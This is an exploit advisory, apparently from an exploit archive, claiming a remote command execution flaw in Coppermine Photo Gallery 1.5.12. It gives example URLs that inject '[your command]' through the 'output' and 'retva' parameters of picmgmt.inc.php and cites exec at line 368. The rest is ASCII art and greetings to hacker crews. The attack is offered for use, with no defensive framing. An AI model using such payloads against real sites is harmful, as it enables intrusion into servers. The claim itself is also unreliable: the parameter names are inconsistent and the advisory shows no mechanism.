|| || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . +----------------------------------------------------------------------- -+ | ....... | | ..''xxxxxxxxxxxxxxx'... | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | | .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | | .xxxxxxxxxxxxxxxxxx'... ........ .'. | | 'xxxxxxxxxxxxxxx'...... '. | | 'xxxxxxxxxxxxxx'..'x.. .x. | | .xxxxxxxxxxxx'...'.. ... .' | | 'xxxxxxxxx'.. . .. .x. | | xxxxxxx'. .. x. | | xxxx'. .... x x. | | 'x'. ...'xxxxxxx'. x .x. | | .x'. .'xxxxxxxxxxxxxx. '' .' | | .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | | .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | | .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | | .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | | .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | | .'xxxxxxx'.... ...xxxxxxx'. | | ..'xxxxx'.. ..xxxxx'.. | | ....'xx'.....''''... | +----------------------------------------------------------------------- -+ Remote Command Execution Vulnerability ======================================================================== Coppermine Photo Gallery <== (picmgmt.inc.php) # [+] Author : Sn!pEr.S!Te Hacker # # [+] Email : sniper-site@HoTMaiL.coM # # [+] T34M Inj3t0r Hacker # # [+] 8-2-2011 # # [+] Script :lmage � Coppermine Photo Gallery # # [+] Download:http://sourceforge.net/projects/coppermine/files/Coppermine/1.5.x/cpg1.5.12.zip/download # # Version: [1.5.12] # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= Exploit : cpg.1.5.12/include/picmgmt.inc.php http://localhost/cpg.1.5.12/include/picmgmt.inc.php?output= [your command] http://127.0.0.1/cpg.1.5.12/include/picmgmt.inc.php?retva=[your command] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= exec $cmd \ $output \ $retval line :368 ---------------------------------------------------------------------- Thanks To All : www.Exploit-db.com |www.root-ar.com | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =========== T34M ============ r0073r,L0rd CruSad3r,SeeMe,Inj3ct0r,Sid3^effects,indoushka,The_Exploited -------------------------------------------------------------------------------- ========all my friend ========== * PrX Hacker * GaMzAh HaCkeR * Dr.Banned * No-QrQr * DMaR AL-TMiMi | * Abu SarH * Fox Hacker * Nazi H4x0R * Mr.aBu.Z7Z7 *HaNniBaL KsA |